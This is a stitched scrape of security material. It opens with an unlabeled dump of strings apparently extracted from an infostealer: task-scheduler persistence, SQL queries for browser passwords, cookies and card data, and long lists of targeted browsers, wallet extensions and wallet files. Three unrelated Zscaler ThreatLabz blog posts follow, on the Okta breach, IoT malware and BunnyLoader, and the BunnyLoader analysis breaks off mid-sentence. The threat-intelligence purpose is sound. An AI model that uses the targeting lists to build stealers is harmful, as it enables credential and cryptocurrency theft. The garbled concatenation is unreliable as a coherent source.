/sc minute /mo 15 /tr \"%ls\" /tn \"\\WindowsAppPool\\%ls\" LeaveCriticalSection EnterCriticalSection Advapi32.dll Autofills/%ls_%ls.txt Available KeyboardLayouts: Gonna gather system information Build mark: CPU: Can't add task in task scheduleO, COeatePOocessW fails; last eOOoO: %x Can't obtain RmStartSession's address, maybe windows don't support RestartManager Can't start process; last error: %x Can't write file; last error: %x Card: Chromium browsers paths were retrieved ComSpec Command line: %ls ComputerName: Config retrieved: %d, %d, %d, %d, %d, %d, %d, %d, %d, %d Content-Disposition: form-data; name=\"%s\" Content-Length: %d Content-Type: multipart/form-data; boundary=%s Cookies Cookies/%ls_%ls.txt Country: {country} CreditCards/%ls_%ls.txt Current language: Default Email Email/Credentials.txt Email: EnterCriticalSection Expand path: %ls Extensions were retrieved FALSE Failed to connect to %s Failed to download sqlite3.dll Failed to export functions from sqlite3.dll Failed to load sqlite3.dll Failed to retrieve chromium browsers paths Failed to retrieve files grabber paths Failed to retrieve gecko browsers paths File Location: Files grabber paths were retrieved FilesGrabber: Sent %ls Find chromium cookies db %ls Find chromium extension %ls with id %ls Find chromium history db %ls Find chromium login data db %ls Find chromium web data db %ls Find gecko autofills db %ls Find gecko cookies db %ls Find gecko file %ls Find gecko history db %ls Find steam data, path %ls Gdi32.dll Gecko browsers were retrieved Gecko/%ls/%ls/%ls GetModuleHandleA Global\\%s%x Gonna gather system information Gonna grab ChromiumBrowsers Gonna grab GeckoBrowsers Gonna grab files Gonna grab outlook Gonna grab steam Gonna grab telegrab Gonna take screenshot GrabFiles HH':'mm':'ss HWID: HandleChromiumBrowsers HandleGeckoBrowsers Hardwares: History/%ls_%ls.txt Holder: HttpOpenRequest fails; last error: %x HttpQueryInfo fails; last error: %x IMAP Password IP: {ip} InitializeCriticalSection InternetConnect fails; last error: %x InternetCrackUrl fails; last error: %x InternetOpen fails; last error: %x Kernel32.dll Key: LeaveCriticalSection Location: {location} Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Name: Network\\Cookies Ntdll.dll ..\\stealer\\geckobrowsers.cpp Ole32.dll Operation System: POP3 Password Password: ProductName Request Retrieve rule FilesGrabber, server side path: %ls Rstrtmgr.dll Rstrtmgr.dllls GetModuleHandleA %sEnterCriticalSections. LeaveCriticalSection SELECT expiration_month, expiration_year, name_on_card, card_number_encrypted FROM credit_cards SELECT fieldname, value FROM moz_formhistory SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies SELECT host_key, is_httponly, path, is_secure, expires_utc, name, encrypted_value FROM cookies SELECT origin_url, username_value, password_value FROM logins SELECT title, url FROM moz_places SELECT url, title FROM urlsFind chromium history db %ls SMTP Server ScreenSize: Screenshot.jpeg Sent log. Gonna send done message Sent screenshot Software\\Microsoft\\Office Software\\Valve\\Steam Sq~70 SrartLoader Start SteamPath Successfully connected to %s Successfully start process SystemInformation.txt Telegram There's file to load. Gonna load it TimeZone: {timezone} Title: Tkernel32.dll Token retrieved: %s Trying to connect to %s URL: USERPROFILE|tELEGRAMdESKTOP|TDATA Url: User32.dll UserName: Username: Value: Wallets/%ls_%ls_%ls Wininet.dllCrypt32.dll Wininet.dllCrypt32.dllGdiplus.dll Wininet.dllCrypt32.dllGdiplus.dllShlwapi.dllKernel32.dll Write file content in %ls Zip code: {zipcode} abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 build cert8.db cert9.db chromium-browsers computername encrypted_key extensions filename files done files gecko-browsershi Sent system information kernel32.dll key3.db key4.db loader loghub/master logins.json msgtzn SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion signons.sqlite sqlite3 sqlite3_close sqlite3_column_blob sqlite3_column_bytes sqlite3_column_text sqlite3_open sqlite3_open_v2 sqlite3_open_v2sqlite3_finalize sqlite3_prepare_v2 sqlite3_step token username wallets\\ Targeted Chromium Browsers Citrio|%localappdata%\CatalinaGroup\Citrio\User Data Coowon|%localappdata%\Coowon\Coowon\User Data Liebao|%localappdata%\liebao\User Data QIP Surf|%localappdata%\QIP Surf\User Data Orbitum|%localappdata%\Orbitum\User Data Comodo Dragon|%localappdata%\Comodo\Dragon\User Data Amigo|%localappdata%\Amigo\User\User Data Torch|%localappdata%\Torch\User Data Yandex Browser|%localappdata%\Yandex\YandexBrowser\User Data Comodo|%localappdata%\Comodo\User Data 360Browser|%localappdata%\360Browser\Browser\User Data Maxthon3|%localappdata%\Maxthon3\User Data K-Melon|%localappdata%\K-Melon\User Data Sputnik|%localappdata%\Sputnik\Sputnik\User Data Nichrome|%localappdata%\Nichrome\User Data CocCoc|%localappdata%\CocCoc\Browser\User Data Uran|%localappdata%\Uran\User Data Chromodo|%localappdata%\Chromodo\User Data Mail.Ru|%localappdata%\Mail.Ru\Atom\User Data Brave Browser|%localappdata%\BraveSoftware\Brave-Browser\User Data Opera|%appdata%\Opera Software\Opera Stable Google Chrome|%localappdata%\Google\Chrome\User Data Microsoft Edge|%localappdata%\Microsoft\Edge\User Data Chromium|%localappdata%\Chromium\User Data Opera|%localappdata%\Opera Software|ChromePlus %localappdata%\MapleStudio\ChromePlus\User Data Irpathium|%localappdata%\Irpathium\User Data 7Star|%localappdata%\7Star\7Star\User Data CentBrowser|%localappdata%\CentBrowser\User Data Chedot|%localappdata%\Chedot\User Data Vivaldi|%localappdata%\Vivaldi\User Data Kometa|%localappdata%\Kometa\User Data Elements Browser|%localappdata%\Elements Browser\User Data Epic Privacy Browser|%localappdata%\Epic Privacy Browser\User Data Uran|%localappdata%\uCozMedia\Uran\User Data Sleipnir|%localappdata%\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer Targeted Gecko Browsers Firefox|%appdata%\Mozilla\Firefox\Profiles Comodo IceDragon|%appdata%\Comodo\IceDragon\Profiles BlackHawk|%appdata%\NETGATE Technologies\BlackHawk\Profiles Cyberfox|%appdata%\8pecxstudios\Cyberfox\Profiles K-Meleon|%appdata%\K-Meleon\Profiles Icecat|%appdata%\Mozilla\icecat\Profiles Targeted Browser Extensions Coinbase Wallet|hnfanknocfeofbddgcijnmhnfnkdnaad Guarda|hpglfhgfnhbgpjdenjgmdgoeiappafln EQUAL Wallet|blnieiiffboillknjnepogjhkgnoapac Jaxx Liberty|cjelfplplebdjjenllpjcblmjkfcffne BitApp Wallet|fihkakfobkmkjojpchpfgcmhfjnmnfpi iWallet|kncchdigobghenbbaddojjnnaogfppfj Wombat|amkmjjmmflddogmhpjloimipbofnfjih MEW CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm GuildWallet|nanjmdknhkinifnkgdcggcfnhdaammmj Saturn Wallet|nkddgncdjgjfcddamfgcmfnlhccnimig Ronin Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec NeoLine|cphhlgmgameodnhkjdmkpanlelnlohao CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk Liquality Wallet|kpfopkelmapcoipemfendmdcghnegimn Terra Station|aiifbnbfobpmeekipheeijimdpnlpgpp Keplr|dmkamcknogkgcdfhhbddcghachkejeap Sollet|fhmfendgdocmcbmfikdcogofphimnkno Auro Wallet|cnmamaachppnkjgnildpdmkaakejnhae Polymesh Wallet|jojhfeoedkpkglbfimdfabpdfjaoolaf ICONex|flpiciilemghbmfalicajoolhkkenfel Nabox Wallet|nknhiehlklippafakaeklbeglecifhad KHC|hcflpincpppdclinealmandijcmnkbgn MetaMask|nkbihfbeogaeaoehlefnkodbefgpgknn TronLink|ibnejdfjmmkpcnlpebklmnkoeoihofec Binance Chain Wallet|fhbohimaelbohpjbbldcngcnapndodjp Yoroi|ffnbelfdoeiohenkjibnmadjiehjhajb Nifty Walletjbdaocneiiinmjbjlgalhcelgbejmnpath Math Wallet|afbcbjpbpfadlkmhmclhkeeodmamcflc Temple|ookjlbkiijinhpmnjffcofjonbfbgaoc TezBox|mnfifefkajgofkcjkempathiaecocnkjeh DAppPlay|lodccjjbdhfakaekdiahmedfbieldgik BitClip|ijmpgkjfkbfhoebgogflfebnmejmfbml Steem Keychain|lkcjlnjfpbikmcmbachjpdbijejflpcm Nash Extension|onofpnbbkehpmmoabgpcpmigafmmnjhl Hycon Lite Client|bcopgchhojmggmffilplmbdicgaihlkp ZilPay|klnaejjgbibmhlephnhpmaofohgkpgkd Coin98 Wallet|aeachknmefphepccionboohckonoeemg Authenticator|bhghoamapcdpbohphigoooaddinpkbai Cyano Wallet|dkdedlpgdmmkkfjabffeganieamfklkm Byone|nlgbhdfgdhgbiamfdfmbikcdghpathoadd OneKey|infeboajgfhgbjpjbeppbkgnabfdkdaf LeafWallet|cihmoadaighcejopammfbmddcmdekcje Authy|gaedmjdfmmahhbjefcbgaolhhanlaolb EOS Authenticator|oeljdldpnmdbchonielpathgobddffflal GAuth Authenticator|ilgcnhelpchnceeipipijaljkblbcobl Trezor Password Manager|imloifkgjagghnncjkhggdhalmcnfklk Ever|cgeeodpfagjceefieflmdfphplkenlfk KardiaChain|pdadjkfkgcafgbceimcpbkalnfnepbnk Rabby|acmacodkjbdgmoleebolmdjonilkdbch Phantom|bfnaelmomeimhlpmgjnjophhpkkoljpa Oxygen|fhilaheimglignddkjgofkcbgekhenbh Pali|mgffkfbpathihjpoaomajlbgchddlicgpn XDEFI|hmeobnfnfcmdkdcmlblgagmfpfboieaf Nami|lpfcbjknijpeeillifnkikgncikgfhdo MultiversX DeFi Wallet|dngmlblcodfobpdpecaadgfbcggfjfnm Keeper|lpilbniiabackdjcionkobglmddfbcjo Softlare|bhhhlbepdkbapadjdnnojkbgioiodbic Govy|jnkelfanjkeadonecabehalmbgpfodjm SteemKeychain|jhgnbkkipaallpehbohjmkbjofjdmepath Braavos|jnlgamecbpmbajjfhmmmlhejkemejdma Enkrypt|kkpllkodjelopathieedojogacfhpaihoh OKX|mcohilncbfahbmgdjkbpemcciiolgcge HashPack|gjagmgpathdbbciopjhllkdnddhcglnemk Eternl|kmhcihpebfmpgmihbkipmjlmmioameka Pontem Aptos|phkbamefinggmakgklpkljjmgibohnba Martianin|efbglgofoippbgcjepnhiblaibcnclgk Finnie|cjmkndjhnagcfbpiemnkdpomccnjblmj Leap Terra|aijcbedoijmgnlmjeegjaglmepbmpkpi Dashlane|fdjamakpfbbddfjaooikfcpapjohcfmg NordPass|fooolghllnmhmmndgjiamiiodkpenpbb Roboform|pnlccmojcmeohlpggmfnbbiapkmbliob LastPass|hdokiejnpimakedhajhdlcegeplioahd BrowserPass|naepdomgkenhinolocfifgehpathddafch MYKI|bmikpgodpkclnkgmnpphehdgcimmpathed Targeted Cryptocurrency Wallets Wallets/Jaxx Desktop|%appdata%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb|*.*|0 Wallets/Atomic|%appdata%\atomic\Local Storage\leveldb|*.*|0 Wallets/Binance|%appdata%\Binance|app-store.json,simple-storage.json,.finger-print.fp|0 Wallets/Coinomi|%appdata%\Coinomi\Coinomi\wallets|.wallet,*.config|0 Wallets/Exodus|%appdata%\Exodus|exodus.conf.json,window-state.json,passphrase.json,seed.seco,info.seco|1 Wallets/Bitcoin Core|%appdata%\Bitcoin\wallets|wallet.dat|1 Wallets/Bitcoin Core Old|%appdata%\Bitcoin|*wallet*.dat|0 Wallets/Dogecoin|%appdata%\Bitcoin\wallets|*wallet*.dat|0 Wallets/Raven Core|%appdata%\Raven|*wallet*.dat|0 Wallets/Daedalus Mainnet|%appdata%\Daedalus Mainnet\wallets|she*.sqlite|0 Wallets/Blockstream Green|%appdata%\Blockstream\Green\wallets|*.*|1 Wallets/Wasabi Wallet|%appdata%\WalletWasabi\Client\Wallets|*.json|0 Wallets/Ethereum|%appdata%\Ethereum|keystore|0 Wallets/Electrum|%appdata%\Electrum\wallets|*.*|0 Wallets/ElectrumLTC|%appdata%\Electrum-LTC\wallets|*.*|0 Wallets/Electron Cash|%appdata%\ElectronCash\wallets|*.*|0 Wallets/MultiDoge|%appdata%\MultiDoge|multidoge.wallet|0 Wallets/Jaxx Desktop Old|%appdata%\jaxx\Local Storage|file__0.localstorage|0 Wed, 25 oct 2023 08:30:01 -0700 Javier Vicente Responding and Defending Against IdP Vendor Compromise Introduction Based on Okta's statement on October 20 regarding a recent security breach, it has been determined that the threat actor successfully gained access to Okta's customer support system. Once inside the system, the threat actor was able to view files uploaded by Okta customers in relation to recent support cases with valid session tokens. By utilizing the extracted token from the Okta support system and support cases, the threat actor subsequently gained access to customer systems. In this post, Zscaler ThreatLabz and the product security team describe the impact of identity provider (IdP) breaches and how your organization can better protect itself against these attacks by leveraging industry-wide best practices. The Potential Impacts of Identity Provider Compromise Identity threats targeting IdPs have quickly become the attack vector of choice for many threat actors. The recent compromise of a leading IdP provider isn't the first time adversaries gained access to critical customer information and it won't be the last. When an IdP is compromised, the consequences can be severe. Unauthorized access to user accounts and sensitive information becomes a significant concern, leading to potential data breaches, financial loss, and unauthorized activity. Identity attacks use social engineering, prompt-bombing, bribing employees for 2FA codes, and session hijacking (among many techniques) to get privileged access. The theft of user credentials, such as usernames and passwords or session tokens, can enable attackers to infiltrate other systems and services, and grant access to sensitive systems and resources. The exposure of personal or sensitive information can lead to identity theft, phishing attacks, and other forms of cybercrime. The recent breach serves as a stark reminder of the importance of robust security measures and continuous monitoring to safeguard identity provider systems and to protect against these potential impacts. Traditional security controls are bypassed in such attacks as attackers assume a user's identity and their malicious activity is indistinguishable from routine behavior. Unfortunately, every time a breach like this is reported, the security community is bombarded with pseudo-silver bullets claiming how the compromise could have been averted if only a particular solution had been deployed. There are no silver bullets in cybersecurity. Adversaries can bypass even the best-laid defense plans. This post explains several vendor-agnostic recommendations for how you can better prevent, detect, and/or contain a security incident targeting IdPs. By leveraging a combination of zero trust principles, deception & honeypots for detecting threats that bypass existing controls, and Identity Threat Detection & Response (ITDR) for maintaining strong identity hygiene, you can get visibility into active sessions and credential exposure on endpoints, while also being able to detect identity-specific attacks. The Importance of Zero Trust Architecture in Defending Against IdP Compromise Zero Trust Network Access (ZTNA) replaces network-level based access and reduces excessive implicit trust for access to resources, primarily from remote locations, by employees, contractors, and other third parties. In this breach, the user unknowingly uploaded a file which had sensitive information to Okta's support management system. The adversary leveraged the session cookies from the uploaded information to further advance the breach. The DLP-like technology can be effective in preventing users uploading files with the sensitive data unknowingly. Using posture control, organizations can limit access to applications on managed devices only. If the adversaries try to access the critical applications or servers from unmanaged devices, access will be prohibited. It is imperative to make unmanaged device access a mandatory part of the ZTNA architecture. The attack blast radius can be reduced by enforcing stringent segmentation policies. An administrator should define the policies for combining user attributes and services to enforce who has access to what. It is important to determine if a universal access policy is needed for when users are on and off premises. In this recent Okta breach, there are no reports that suggest major incidents so far. But in most cyberattacks, the threat actors are after the crown jewel systems and the data. Once the attackers have established a network foothold, they move laterally in the network, identifying the systems that are critical for the organizations to launch further attacks, including data theft. Defense-in-Depth (DiD) plays a very critical role in breaking the attack chain. The layered security approach enforces very strong defense against sophisticated attacks such that if one layer fails to detect an advancement of a threat actor in the attack chain, then the next layer can still detect the attacker’s next move and break the chain to neutralize the attack. Leveraging Deception and ITDR Using the Zero Trust Platform for Defense While zero trust reduces your attack surface by making resources invisible to the internet and minimizes the blast radius by connecting users directly to applications, deception and ITDR are two additional tools in your arsenal that can help prevent, detect, and contain identity-driven attacks. Deception Adversaries rely on human error, policy gaps, and poor security hygiene to circumvent defenses and stay hidden as they escalate privileges and move laterally. No security team can be 100% certain that their defenses are foolproof all the time–this is what adversaries take advantage of. Deception changes the dynamics by injecting uncertainty into your environment. After hijacking a session token or using credentials, the attacker will scan the environment to find accounts and keys, and attempt to access critical applications and sensitive data. A simple deception strategy can help detect adversary presence before an attacker can establish persistence or exfiltrate data. Kill Chain Attack Technique Deception Defense Initial Access Uses stolen/purchased credentials to access internet-facing applications like IdPs, VPNs, RDP, and VDI. Creates decoys of internet-facing applications like IdPs, VPNs, and Citrix servers that attackers are very likely to target. Reconnaissance Uses AD explorer to enumerate users, computers, and groups. Creates decoy users, user groups, and computers in your Active Directory. Privilege Escalation Exploit vulnerabilities in collaboration platforms like Confluence, JIRA, and GitLab to get credentials of a privileged account. Creates decoys of internal apps like Confluence, JIRA, and Gitlab that intercept the use of credentials to access this system. Privilege Escalation Uses Mimikatz to extract credentials from memory in Windows. These credentials are then used to access higher privileged accounts. Plants decoy credentials in Windows memory. Lateral Movement Moves laterally to core business applications and cloud environments to gain access to the victim organization's data. Plants decoys of internal apps like code repositories, customer databases, business applications, and objects like S3 buckets and AWS keys in your cloud tenants. Exfiltration The adversary uses their access to download sensitive data and extort the victim. Plants decoy files and other sensitive-seeming information on endpoints that detect any attempt to copy, modify, delete, or exfiltrate the files. Using deception will not always stop an identity attack but it will act as a last line of defense to detect a post-breach adversarial presence. This can help prevent a compromise from turning into a breach. ITDR ITDR is an emerging security discipline that sits at the intersection of threat detection and identity and access management. It is becoming a top security priority for CISOs due to the rise of identity attacks and ITDR’s ability to provide visibility into an organization’s identity posture, implement hygiene best practices, and detect identity-specific attacks. Augment your zero trust implementation with ITDR to prevent and detect identity attacks using following principles: Identity Posture Management: Continuously assess identity stores like Active Directory, AzureAD, and Okta to get visibility into misconfigurations, excessive permissions, and Indicators or Exposure (IOEs) that could give attackers access to higher privileges and lateral movement paths. Implement identity hygiene: Use posture management best practices to revoke permissions and configure default policies that minimize attack paths and privileges. Threat Detection: Monitor endpoints for specific activities like DCSync, DCShadow, Kerberoasting, LDAP enumeration, and similar changes that correlate to malicious behavior. Detecting and Responding to IdP Breaches An effective Security Operations Center (SOC) playbook plays a crucial role in proactively identifying and mitigating potential IdP attack vectors. By implementing a comprehensive monitoring and detection strategy, organizations can swiftly respond to IdP attack attempts, safeguard user identities, and protect critical resources. Our SOC playbook for the IdP and MFA threat vectors contains detection alerts which are essential to identifying and responding to potential security incidents. Monitor and alert for: Monitor permission changes implemented by suspicious users Admin with an unusual location Admin with an unusual user agent Admin with an unusual agent version Monitor for failed Okta authentications for privileged users without a follow-up successful authentication Monitor for failed Okta authentications for different users coming from the same source Monitor for reused session IDs Same session ID with different user agents Same session ID coming from different countries Monitor for MFA resets For Okta customers, it is advisable to contact the company directly to obtain more information regarding the potential impact to their organization. Additionally, we offer the following recommendations as immediate action: Perform thorough investigation for any of the following recent events in your environment: Recent password resets or MFA resets performed by helpdesk or support personnel Review all recently created Okta administrators Review that all password resets are valid Review all MFA related events, such as MFA resets or changes to any MFA configuration Ensure MFA is enabled for all user accounts and administrator accounts, and review actions performed by the administrator accounts Identity and MFA Best Practices Employing security best practices in managing your identities and MFA configuration is paramount in establishing a robust security posture and effectively mitigating the risks associated with unauthorized access and data breaches. By diligently implementing the following measures and best practices, organizations can greatly fortify the safeguarding of identities and bolster the efficacy of their MFA deployment. Protect User Identities Use Strong and Unique Passwords: Encourage users to create strong, complex, and unique passwords for their accounts. Implement password policies that enforce minimum length, complexity, and regular password changes Implement Least Privilege: Follow the principle of least privilege, granting users only the minimum access necessary to perform their tasks. By limiting user privileges, you reduce the potential impact of compromised credentials. Educate Users: User awareness and education play a vital role in maintaining security. Train users on the importance of strong passwords, how to recognize phishing attempts, and how to properly use MFA methods. Regularly remind users to follow security best practices and report any suspicious activities. Protect against MFA attacks Traditional MFA methods, such as SMS codes or email-based one-time passwords (OTPs), can be susceptible to phishing attacks. Phishers can intercept these codes or trick users into entering them into fake login pages, thereby bypassing the additional layer of security provided by MFA. To address this vulnerability, phish-resistant MFA methods have been developed. These methods aim to ensure that even if users are tricked into entering their credentials on a phishing website, the attacker cannot gain access without the additional authentication factor. Use FIDO2-Based MFA: FIDO2 (Fast Identity Online) is a strong authentication standard that provides secure and passwordless authentication. It is recommended to implement FIDO2-based MFA, which uses public key cryptography to enhance security and protect against phishing attacks. Utilize Hardware Tokens: Hardware tokens, such as USB security keys or smart cards, can provide an extra level of security for MFA. These physical devices generate one-time passwords or use public key cryptography for authentication, making it difficult for attackers to compromise. Zscaler’s ThreatLabZ and product security teams will continue to monitor the Okta breach. If any further information is disclosed by Okta or discovered through other sources, we will publish an update to this post. Wed, 25 oct 2023 17:40:50 -0700 Deepen Desai El informe ThreatLabz de 2023 indica un crecimiento del 400 % en los ataques de malware de IoT Introducción Este blog sirve como una breve sinopsis de los puntos clave revelados en el Informe de amenazas de OT y IoT empresarial de Zscaler ThreatLabz 2023.  Nuestro informe analiza el crecimiento del tráfico de dispositivos de Internet de las cosas (IoT) y los ataques de malware de IoT, además de cómo las vulnerabilidades heredadas, los dispositivos específicos y las industrias específicas se han convertido en actores centrales en la narrativa de seguridad de IoT y de tecnología operativa (OT). Además, el informe describe las mejores prácticas de seguridad de IoT y una guía práctica para prevenir ataques de malware de IoT.  El informe también ofrece estrategias para garantizar la resistencia de los entornos OT, destacando la convergencia de IoT y OT orientada a la transformación digital en sectores críticos como la manufactura y los servicios públicos. Crecimiento del tráfico de dispositivos conectados y ataques de malware de IoT La investigación de ThreatLabz indica claramente que la adopción de IoT sigue en una trayectoria ascendente, como lo demuestra un aumento del 18 % en el tráfico de dispositivos de IoT en comparación con evaluaciones anteriores en 2021. Sin embargo, este ecosistema de IoT en expansión no está exento de problemas. El equipo de ThreatLabz analizó aproximadamente 300,000 ataques bloqueados en dispositivos de IoT y encontró un aumento preocupante en los ataques de malware de IoT: de 400 % para ser exactos. La actividad de las redes zombi sigue dominando el espacio de los ataques de malware, y las familias de malware Mirai y Gafgyt representan el 66 % de las cargas útiles de los ataques. Figura 1: Principales familias de malware de IoT observadas en la nube de Zscaler, enero-junio de 2023 La industria manufacturera lidera el tráfico único de IoT y los ataques de malware El liderazgo sustancial del sector manufacturero en dispositivos IoT únicos, casi triplica el número de otros sectores. Este aumento en la adopción subraya la dedicación de la industria a la adopción de la automatización avanzada y la digitalización, posicionándola como pionera en el uso de la IoT para mejorar la eficiencia de la producción, la calidad del producto y la innovación en la era conocida como Industria 4.0 o Cuarta Revolución Industrial. La Industria 4.0 se caracteriza por la integración de tecnologías digitales y procesos industriales. Los dispositivos IoT son el eje de la Industria 4.0 y proporcionan conectividad y datos en tiempo real en toda la cadena de producción. La convergencia de dispositivos y datos de IoT en sistemas OT existentes está transformando las operaciones industriales.  El crecimiento explosivo de la innovación tecnológica y de los dispositivos IoT en la industria manufacturera ha convertido a este sector en un objetivo prioritario para los ataques de malware. En una semana promedio, el sector manufacturero recibe más del triple de ataques que cualquier otro sector. Los clientes del sector manufacturero se llevan la peor parte de los ataques de malware, con un 54.5 %. Con una baja tolerancia a las interrupciones operativas, la industria manufacturera es una apuesta fuerte para los ataques de malware. Los ataques a los clientes del sector manufacturero pueden tener efectos dominó que repercutan en otros sectores como:  cadena de suministro y logística defensa y seguridad nacional Finanzas Venta al por menor Tecnología construcción y bienes raíces Figura 2: Desglose de los sectores verticales a los cuales se dirigen los ataques de malware de IoT Los elevados volúmenes de ataques no solo ponen en peligro los sistemas de IoT, sino que también suponen una grave amenaza para los procesos de OT. Los ataques a la infraestructura OT pueden provocar graves perturbaciones en operaciones industriales cruciales y, en algunos casos, incluso poner en peligro vidas humanas. Estados Unidos atrae a la mayoría de los autores de malware Estados Unidos cuenta con una infraestructura digital sólida e interconectada que actúa como un imán para los autores de malware en todo el mundo. Su extensa red y su ecosistema de tecnología avanzada ofrecen oportunidades incomparables para distribuir malware de manera eficiente, causar estragos con un impacto generalizado y, en última instancia, afectar una amplia variedad de sistemas para explotar vulnerabilidades y propagar software malicioso. Figura 3: Principales países afectados por malware de IoT Mejores prácticas de seguridad para IoT/OT Aquí encontrará un adelanto de las mejores prácticas de IoT/OT recopiladas por nuestro equipo de expertos en ciberseguridad. Para obtener la lista completa de mejores prácticas, descargue una copia gratuita del Informe de amenazas de IoT y OT de ThreatLabz 2023. Mantenga una visibilidad integral de los dispositivos IoT. La seguridad de los dispositivos IoT comienza con saber qué dispositivos están conectados a su red y qué están haciendo esos dispositivos. Obtenga visibilidad de todos los dispositivos de IoT, incluidos los dispositivos no administrados, mediante el uso de soluciones que analizan registros de red para monitorear las comunicaciones y la actividad. La visibilidad continua y el conocimiento de lo que está conectado a la red en todo momento son fundamentales, sin importar dónde se encuentren los dispositivos. Proteja las credenciales de administrador y habilite MFA. La autenticación multifactor (MFA) requiere que los usuarios ingresen a un modo secundario de verificación además de su contraseña. Esta capa adicional de seguridad puede impedir que los atacantes obtengan acceso a las cuentas de los usuarios si han obtenido credenciales, evitando el movimiento lateral de amenazas desde los dispositivos de los usuarios comprometidos.  Capacite a los empleados sobre la seguridad de los dispositivos IoT. Eduque a los empleados sobre los riesgos de conectar dispositivos no autorizados a la red. Anímelos a informar sobre cualquier dispositivo nuevo que conecten y realice capacitaciones de concientización sobre seguridad para ayudar a los empleados a identificar y evitar ataques a los dispositivos de los usuarios.  Implemente una arquitectura de seguridad de confianza cero.  Tanto para IoT como para OT, elimine la confianza implícita. Haga cumplir la segmentación con acceso con privilegios mínimos para garantizar que los usuarios y los dispositivos puedan acceder solo a lo que necesitan. Cualquier dispositivo de IoT en la sombra no autorizado que necesite acceso a Internet debe pasar por una inspección de tráfico e, idealmente, no tener acceso a los datos corporativos a través de un proxy. La confianza cero también es clave para evitar tiempos de inactividad no planificados y garantizar la máxima productividad en los sistemas industriales. La confianza cero puede minimizar su superficie de ataque, eliminar el movimiento lateral y acelerar la convergencia OT/IoT. Conclusión La convergencia de IoT y OT representa un momento crucial en la evolución de la tecnología y la industria, impulsada por una adopción cada vez mayor de IoT, la conectividad y la innovación. Sin embargo, como hemos visto, también abre nuevas vías para las amenazas cibernéticas que pueden interrumpir operaciones críticas, como se analiza en el Informe de amenazas de IoT y OT empresarial de Zscaler ThreatLabz 2023. A medida que avanzamos, es vital permanecer alerta y proactivo en la implementación de medidas de seguridad para garantizar un mundo digital interconectado seguro y protegido. Zscaler ThreatLabz publica este informe año tras año para ayudar a las organizaciones a reconocer la importancia de medidas de seguridad sólidas y salvaguardar nuestro futuro interconectado. Tue, 24 oct 2023 09:05:29 -0700 Viral Gandhi BunnyLoader, the newest Malware-as-a-Service Introduction In early September, Zscaler ThreatLabz discovered a new Malware-as-a-Service (MaaS) threat called “BunnyLoader” being sold on various forums. BunnyLoader provides various functionalities such as downloading and executing a second-stage payload, stealing browser credentials and system information, and much more. BunnyLoader employs a keylogger to log keystrokes as and a clipper to monitor the victim’s clipboard and replace cryptocurrency wallet addresses with actor-controlled cryptocurrency wallet addresses. Once the information is obtained, BunnyLoader encapsulates the data into a ZIP archive and proceeds to transmit the pilfered data to a command-and-control (C2) server. In this blog, we’ll describe how BunnyLoader works and its technical components. Key Takeaways ThreatLabz identified a new malware loader written in C/C++ named “BunnyLoader” sold on various forums for $250. BunnyLoader is under rapid development with multiple feature updates and bug fixes. BunnyLoader employs various anti-sandbox techniques during its attack sequence. BunnyLoader downloads and executes a second-stage payload, logs keys, steals sensitive information and cryptocurrency, and executes remote commands. Basics In early September, ThreatLabz came across a new malware loader named BunnyLoader. The malware was being sold on various forums by a user named “PLAYER_BUNNY”/”PLAYER_BL”, who seems to be one of the developers of the loader as shown in the figure below. Figure 1: BunnyLoader advertisement from criminal forums. Based on the advertisement, BunnyLoader has the following features: Written in C/C++ Fileless loader - download & execute further malware stages in memory Consists of stealer and clipper capabilities Remote command execution Incorporates anti-analysis techniques Provides a web panel showcasing stealer logs, total clients, active tasks and much more Price - $250 (Lifetime) Since BunnyLoader’s v1.0 initial release on September 4, 2023, the malware has been under rapid development, with many feature updates and bug fixes being released between the 4th of September and the time this blog was written (September 29 2023). In the table below, you can see that BunnyLoader’s updates address bug issues, changes to the C2 panel, and even new pricing tiers. BunnyLoader release history Version Date of Release Updates BunnyLoader v1.0 Sept 4, 2023 N/A BunnyLoader v1.1 Sept 5, 2023 Client bug Compress stealer logs before uploading Command added for reverse shell: pwd BunnyLoader v1.2 Sept 6, 2023 Added browser history recovery to stealer Added NGRok auth-token recovery to stealer Added Chromium browser paths (Chromium, Google Chrome x86, MapleStudio, Iridium, Maxthon3) BunnyLoader v1.3 Sept 9, 2023 Added credit card recovery to stealer function Added support for 16 different credit card types Fix C2 bugs BunnyLoader v1.4 Sept 10, 2023 Implemented AV evasion BunnyLoader v1.5 Sept 11, 2023 Added VPN recovery to stealer (ProtonVPN & OpenVPN) Fix fileless loader bugs Optimization in loading logs BunnyLoader v1.6 Sept 12, 2023 Added downloads history viewer to stealer Added anti-sandbox techniques BunnyLoader v1.7 Sept 15, 2023 Implemented additional AV evasion BunnyLoader v1.8 Sept 15, 2023 Implemented keylogger functionality Bug fixes in execution of tasks Fix C2 bugs BunnyLoader v1.9 Sept 17, 2023 Added game recovery to stealer (Uplay & Minecraft) Added 5 Chromium browser paths Added 1 desktop wallet recovery to stealer BunnyLoader v2.0 Sept 27, 2023 C2 GUI Changes Fix critical vulnerabilities - SQL injection in the C2 Panel which would give access to the database and XSS vulnerabilities fixed Major bugs fixed C2 will detect and block exploit attempts Optimization in stealer Optimization in fileless loader Selling private stub: Advanced and proactive anti-analysis Inject payload into memory (support x86/x64) AV evasion Persistence New prices: Payload - $250 Payload + Stub - $350 C2 Panel The BunnyLoader C2 panel showcases a list of various tasks including: downloading and executing additional malware keylogging stealing credentials manipulating a victim’s clipboard to steal cryptocurrency running remote commands on the infected machine The parameters consisting of the download URL and the cryptocurrency wallet addresses are added in the panel as shown below. Figure 2: A screenshot of the BunnyLoader C2 panel configuration. The BunnyLoader panel also provides: statistics for infections the total connected/disconnected clients active tasks stealer logs and also The information can be cleared from the panel. Figure 3: A screenshot of the statistics and options to clear data in the BunnyLoader C2 panel. In addition, the infected machines can be controlled remotely through the C2 panel, as shown in the screenshot below. Figure 4: A screenshot of the BunnyLoader C2 panel showing infected systems. Technical AnalysisIn the following section, we will analyze a malware sample of BunnyLoader. Upon execution of BunnyLoader, the loader performs the following actions:Creates a new registry value named 